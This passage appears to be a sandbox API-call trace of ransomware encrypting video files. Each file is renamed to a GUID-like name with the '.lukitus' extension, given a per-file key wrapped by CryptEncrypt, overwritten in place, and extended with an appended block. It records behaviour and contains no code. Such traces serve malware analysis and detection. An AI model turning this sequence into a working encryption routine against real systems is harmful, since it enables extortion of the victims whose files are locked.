1 [0109.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.279] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Videos\\gq2odSlVTX32RO7-UPJ\\Herk5RK.avi" (normalized: "c:\\users\\aetadzjz\\videos\\gq2odslvtx32ro7-upj\\herk5rk.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.279] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Videos\\gq2odSlVTX32RO7-UPJ\\Herk5RK.avi" (normalized: "c:\\users\\aetadzjz\\videos\\gq2odslvtx32ro7-upj\\herk5rk.avi"), lpNewFileName="c:\\Users\\aETAdzjz\\Videos\\gq2odSlVTX32RO7-UPJ\\F56924BE-9663-41BB-65151815-9CA1B64A11E4.lukitus" (normalized: "c:\\users\\aetadzjz\\videos\\gq2odslvtx32ro7-upj\\f56924be-9663-41bb-65151815-9ca1b64a11e4.lukitus"), dwFlags=0x9) returned 1 [0109.280] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.280] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.285] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x6bbe, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x6bbe, lpOverlapped=0x0) returned 1 [0109.286] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.286] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x6bbe, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x6bbe, lpOverlapped=0x0) returned 1 [0109.286] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.286] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x65293130, dwHighDateTime=0x1d31760)) [0109.286] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.286] FlushFileBuffers (hFile=0x328) returned 1 [0109.289] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\gq2odSlVTX32RO7-UPJ\\WTGYwX_xAAyiysOv.mp4" (normalized: "c:\\users\\aetadzjz\\videos\\gq2odslvtx32ro7-upj\\wtgywx_xaayiysov.mp4"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69cb59b0, ftCreationTime.dwHighDateTime=0x1d2fbe6, ftLastAccessTime.dwLowDateTime=0x556f7220, ftLastAccessTime.dwHighDateTime=0x1d2fad9, ftLastWriteTime.dwLowDateTime=0x556f7220, ftLastWriteTime.dwHighDateTime=0x1d2fad9, nFileSizeHigh=0x0, nFileSizeLow=0x7a5b)) returned 1 [0109.289] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.289] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.289] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.289] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.289] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.289] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.289] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.289] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.289] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.289] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.289] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.289] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.289] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.289] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.289] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.289] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.289] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.289] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.289] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.289] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.289] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Videos\\gq2odSlVTX32RO7-UPJ\\WTGYwX_xAAyiysOv.mp4" (normalized: "c:\\users\\aetadzjz\\videos\\gq2odslvtx32ro7-upj\\wtgywx_xaayiysov.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.289] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Videos\\gq2odSlVTX32RO7-UPJ\\WTGYwX_xAAyiysOv.mp4" (normalized: "c:\\users\\aetadzjz\\videos\\gq2odslvtx32ro7-upj\\wtgywx_xaayiysov.mp4"), lpNewFileName="c:\\Users\\aETAdzjz\\Videos\\gq2odSlVTX32RO7-UPJ\\F56924BE-9663-41BB-3E6508BD-D29B57D1C2AC.lukitus" (normalized: "c:\\users\\aetadzjz\\videos\\gq2odslvtx32ro7-upj\\f56924be-9663-41bb-3e6508bd-d29b57d1c2ac.lukitus"), dwFlags=0x9) returned 1 [0109.291] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.291] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.295] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x7a5b, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x7a5b, lpOverlapped=0x0) returned 1 [0109.296] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.296] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x7a5b, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x7a5b, lpOverlapped=0x0) returned 1 [0109.296] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.296] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x652b9290, dwHighDateTime=0x1d31760)) [0109.297] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.297] FlushFileBuffers (hFile=0x328) returned 1 [0109.300] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\h0HlIK4-OKRqwTJCKj\\9ELHlX71.mp4" (normalized: "c:\\users\\aetadzjz\\videos\\h0hlik4-okrqwtjckj\\9elhlx71.mp4"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e9a8b30, ftCreationTime.dwHighDateTime=0x1d301a9, ftLastAccessTime.dwLowDateTime=0x477a51e0, ftLastAccessTime.dwHighDateTime=0x1d2f934, ftLastWriteTime.dwLowDateTime=0x477a51e0, ftLastWriteTime.dwHighDateTime=0x1d2f934, nFileSizeHigh=0x0, nFileSizeLow=0xde07)) returned 1 [0109.300] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.300] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.300] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.300] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.300] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.300] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.300] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.300] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.300] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.300] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.300] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.300] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.300] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.300] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.300] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.300] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.300] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.300] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.300] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.300] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.300] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Videos\\h0HlIK4-OKRqwTJCKj\\9ELHlX71.mp4" (normalized: "c:\\users\\aetadzjz\\videos\\h0hlik4-okrqwtjckj\\9elhlx71.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.300] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Videos\\h0HlIK4-OKRqwTJCKj\\9ELHlX71.mp4" (normalized: "c:\\users\\aetadzjz\\videos\\h0hlik4-okrqwtjckj\\9elhlx71.mp4"), lpNewFileName="c:\\Users\\aETAdzjz\\Videos\\h0HlIK4-OKRqwTJCKj\\F56924BE-9663-41BB-D017408C-A1C491103B3C.lukitus" (normalized: "c:\\users\\aetadzjz\\videos\\h0hlik4-okrqwtjckj\\f56924be-9663-41bb-d017408c-a1c491103b3c.lukitus"), dwFlags=0x9) returned 1 [0109.301] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.301] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.307] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xde07, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xde07, lpOverlapped=0x0) returned 1 [0109.308] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.308] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xde07, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xde07, lpOverlapped=0x0) returned 1 [0109.308] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.308] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x652df3f0, dwHighDateTime=0x1d31760)) [0109.308] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.309] FlushFileBuffers (hFile=0x328) returned 1 [0109.311] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\h0HlIK4-OKRqwTJCKj\\hU-6eYaCn.flv" (normalized: "c:\\users\\aetadzjz\\videos\\h0hlik4-okrqwtjckj\\hu-6eyacn.flv"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49850, ftCreationTime.dwHighDateTime=0x1d30575, ftLastAccessTime.dwLowDateTime=0x1295b1d0, ftLastAccessTime.dwHighDateTime=0x1d2fb88, ftLastWriteTime.dwLowDateTime=0x1295b1d0, ftLastWriteTime.dwHighDateTime=0x1d2fb88, nFileSizeHigh=0x0, nFileSizeLow=0x7a8b)) returned 1 [0109.311] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.312] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.312] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.312] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.312] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.312] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.312] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.312] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.312] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.312] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.312] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.312] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.312] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.312] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.312] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.312] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.312] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.312] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.312] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.312] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.312] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.312] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.312] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Videos\\h0HlIK4-OKRqwTJCKj\\hU-6eYaCn.flv" (normalized: "c:\\users\\aetadzjz\\videos\\h0hlik4-okrqwtjckj\\hu-6eyacn.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.312] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Videos\\h0HlIK4-OKRqwTJCKj\\hU-6eYaCn.flv" (normalized: "c:\\users\\aetadzjz\\videos\\h0hlik4-okrqwtjckj\\hu-6eyacn.flv"), lpNewFileName="c:\\Users\\aETAdzjz\\Videos\\h0HlIK4-OKRqwTJCKj\\F56924BE-9663-41BB-45ED5AE6-C311E03F5420.lukitus" (normalized: "c:\\users\\aetadzjz\\videos\\h0hlik4-okrqwtjckj\\f56924be-9663-41bb-45ed5ae6-c311e03f5420.lukitus"), dwFlags=0x9) returned 1 [0109.314] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.314] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.318] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x7a8b, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x7a8b, lpOverlapped=0x0) returned 1 [0109.319] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.319] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x7a8b, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x7a8b, lpOverlapped=0x0) returned 1 [0109.319] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.319] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x652df3f0, dwHighDateTime=0x1d31760)) [0109.319] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.320] FlushFileBuffers (hFile=0x328) returned 1 [0109.324] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\h0HlIK4-OKRqwTJCKj\\jHPdC0WPi4JYh1.flv" (normalized: "c:\\users\\aetadzjz\\videos\\h0hlik4-okrqwtjckj\\jhpdc0wpi4jyh1.flv"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3812470, ftCreationTime.dwHighDateTime=0x1d3053f, ftLastAccessTime.dwLowDateTime=0x2cc04290, ftLastAccessTime.dwHighDateTime=0x1d2f71f, ftLastWriteTime.dwLowDateTime=0x2cc04290, ftLastWriteTime.dwHighDateTime=0x1d2f71f, nFileSizeHigh=0x0, nFileSizeLow=0x13d97)) returned 1 [0109.324] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.324] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.324] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.324] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.324] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.324] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.324] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.324] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.324] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.324] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.324] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.324] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.324] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.324] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.325] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.325] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.325] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.325] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.325] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.325] CryptGenRandom (in: 